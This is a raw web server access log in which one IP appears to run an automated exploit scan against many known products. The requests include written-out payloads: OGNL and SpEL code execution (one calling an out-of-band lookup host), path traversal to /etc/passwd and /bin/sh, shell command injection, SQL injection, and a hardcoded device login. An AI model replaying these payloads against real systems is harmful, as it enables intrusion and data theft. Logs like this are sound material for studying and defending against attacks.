195.164.49.69 - - [20/Oct/2024:18:07:54 +0000] GET /cgi-bin/cgitest?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:07:54 +0000] GET /cgi-bin/checkCookie?LD_DEBUG=help HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/check_user?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/chn/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/cht/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/cnswebserver?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/config?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/configure/set_link_neg?LD_DEBUG=help HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:18:07:55 +0000] GET /cgi-bin/configure/swports_adjust?LD_DEBUG=help HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/eng/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/firmware?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/getCheckCode?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/get_status?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/getmac?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/getparam?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/guest/Login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:07:56 +0000] GET /cgi-bin/home?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:07:57 +0000] GET /cgi-bin/htmlmgr?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:07:57 +0000] GET /cgi-bin/index?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:07:57 +0000] GET /cgi-bin/index/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:07:57 +0000] GET /cgi-bin/jscript?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:08:43 +0000] GET /cgi-bin/liveView?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:08:43 +0000] GET /cgi-bin/login?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/login.asp?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/login/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/login/login-page?LD_DEBUG=help HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/login_mgr?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/luci?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/main?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/main-cgi?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:08:44 +0000] GET /cgi-bin/manage/login?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/menu?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/mlogin?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/netbinary?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/nobody/Captcha?LD_DEBUG=help HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/nobody/VerifyCode?LD_DEBUG=help HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/normal_userLogin?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:08:45 +0000] GET /cgi-bin/otgw?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/page?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/rulectl?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/service?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/set_new_config?LD_DEBUG=help HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/sl_webviewer?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/ssi?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/status?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:08:46 +0000] GET /cgi-bin/sysconf?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:09:20 +0000] GET /cgi-bin/systemutil?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/t/out?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/top?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/unauth?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/upload?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/variable?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/wanstatu?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/webcm?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:09:21 +0000] GET /cgi-bin/webmain?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:09:22 +0000] GET /cgi-bin/webproc?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:09:22 +0000] GET /cgi-bin/webscr?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:09:22 +0000] GET /cgi-bin/webviewLogin?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:09:22 +0000] GET /cgi-bin/webviewLogin_m64?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:09:22 +0000] GET /cgi-bin/webviewer?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:09:22 +0000] GET /cgi-bin/welcome?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:09:42 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:18:09:44 +0000] GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2niERI9vWgHSe34Obz5YlyFe82x.jsp HTTP/1.1 404 1200
195.164.49.69 - - [20/Oct/2024:18:10:04 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:10:08 +0000] POST /crowd/admin/uploadplugin.action HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:18:10:10 +0000] GET /crowd/plugins/servlet/exp HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:10:36 +0000] POST /photo/p/api/album.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:10:40 +0000] GET /api/experimental/test HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:10:42 +0000] GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:18:10:44 +0000] POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 404 1147
83.212.98.101 - - [20/Oct/2024:18:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:11:05 +0000] POST /run HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:18:11:18 +0000] POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:18:11:43 +0000] GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:11:45 +0000] GET /ext-js/index.html HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:12:04 +0000] POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 404 1127
83.212.98.101 - - [20/Oct/2024:18:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:12:36 +0000] GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:12:44 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:12:46 +0000] POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:18:13:08 +0000] GET /owa/auth/x.js HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:13:29 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:13:31 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:13:32 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:13:34 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:13:36 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:13:38 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:14:56 +0000] PUT /SDK/webLanguage HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:18:14:58 +0000] GET /x HTTP/1.1 404 1075
195.164.49.69 - - [20/Oct/2024:18:15:18 +0000] GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:18:15:19 +0000] GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:18:15:21 +0000] POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 400 1160
83.212.98.101 - - [20/Oct/2024:18:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:18:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:17:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:17:58 +0000] GET /STATE_ID/123/agentLogUploader HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:18:23 +0000] GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 404 1365
195.164.49.69 - - [20/Oct/2024:18:18:46 +0000] POST /conf_mail.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:19:11 +0000] POST /xmlrpc HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:18:19:13 +0000] GET /rest/api/latest/repos HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:19:19 +0000] POST /SamlResponseServlet HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:19:41 +0000] POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:20:02 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1 404 1160
83.212.98.101 - - [20/Oct/2024:18:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:21:06 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:06 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:06 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:06 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:06 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:07 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:07 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:07 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:07 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:07 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:21:07 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:08 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:08 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:09 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:10 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:10 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:10 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:10 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:10 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:47 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:48 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:49 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:49 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:49 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:21:49 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:49 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:50 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:50 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:50 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:51 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:51 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:51 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:21:51 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:21:53 +0000] POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:18:21:55 +0000] POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:18:21:59 +0000] POST /minio/bootstrap/v1/verify HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:22:02 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:22:04 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
83.212.98.101 - - [20/Oct/2024:18:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:22:38 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:22:39 +0000] POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:22:41 +0000] POST /guestaccess.aspx HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:22:44 +0000] POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:22:57 +0000] PATCH /mgmt/tm/auth/user/2LkDm HTTP/1.1 501 1095
195.164.49.69 - - [20/Oct/2024:18:22:59 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:18:23:01 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:23:02 +0000] PATCH /mgmt/tm/auth/user/2LkDm HTTP/1.1 501 1095
195.164.49.69 - - [20/Oct/2024:18:23:04 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:18:23:06 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:23:26 +0000] POST /userentry?accountId=/../../../tomcat/webapps/Mt5eA/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:23:37 +0000] GET /Mt5eA/CVE-2023-47246.txt?true HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:23:57 +0000] POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:24:41 +0000] GET /cgi-mod/view_help.cgi HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:24:43 +0000] GET /cgi-mod/index.cgi HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:24:45 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:18:24:47 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:18:24:48 +0000] POST /app/rest/users/id:1/tokens/2niEROWY7edILxbd92CfC2EaTEf;.jsp?jsp_precompile=true HTTP/1.1 404 1153
195.164.49.69 - - [20/Oct/2024:18:25:11 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:25:13 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:25:34 +0000] GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAge3tpbnRlcmFjdHNoLXVybH19%22))) HTTP/1.1 404 1313
83.212.98.101 - - [20/Oct/2024:18:25:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:25:56 +0000] POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:18:25:58 +0000] GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:18:26:00 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:18:26:21 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:26:43 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:18:26:59 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:18:27:00 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:18:27:02 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:27:24 +0000] POST /modules/attributewizardpro/file_upload.php HTTP/1.1 404 1124
83.212.98.101 - - [20/Oct/2024:18:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:28:00 +0000] GET /?pum_action=tools_page_tab_system_info HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:28:02 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:28:04 +0000] POST /adxmlrpc.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:28:06 +0000] GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:18:28:08 +0000] GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20ycOYuKJlSQ.txt%60 HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:28:10 +0000] GET /ycOYuKJlSQ.txt HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:28:30 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:28:53 +0000] POST /convert HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:28:55 +0000] GET /file/AXK8vi.txt HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:28:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:28:58 +0000] POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:18:29:00 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
- - - [20/Oct/2024:18:29:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:29:06 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:29:07 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:29:09 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:29:11 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:29:13 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:29:15 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:29:17 +0000] POST /RPC2_Login HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:18:29:19 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:29:20 +0000] POST /wp-login.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:29:22 +0000] GET /wp-admin/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:29:25 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:29:32 +0000] GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:29:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:29:38 +0000] POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:29:41 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:30:25 +0000] POST /cms/content/list HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:30:27 +0000] GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 404 1365
- - - [20/Oct/2024:18:30:31 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:30:33 +0000] POST /classes/Master.php?f=delete_supplier HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:30:34 +0000] POST /scgi-bin/platform.cgi HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:30:36 +0000] POST /scgi-bin/platform.cgi HTTP/1.1 404 1099
- - - [20/Oct/2024:18:30:38 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:30:40 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:18:30:42 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:18:30:44 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
83.212.98.101 - - [20/Oct/2024:18:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:30:47 +0000] GET /admin/login/index.php HTTP/1.1 404 1103
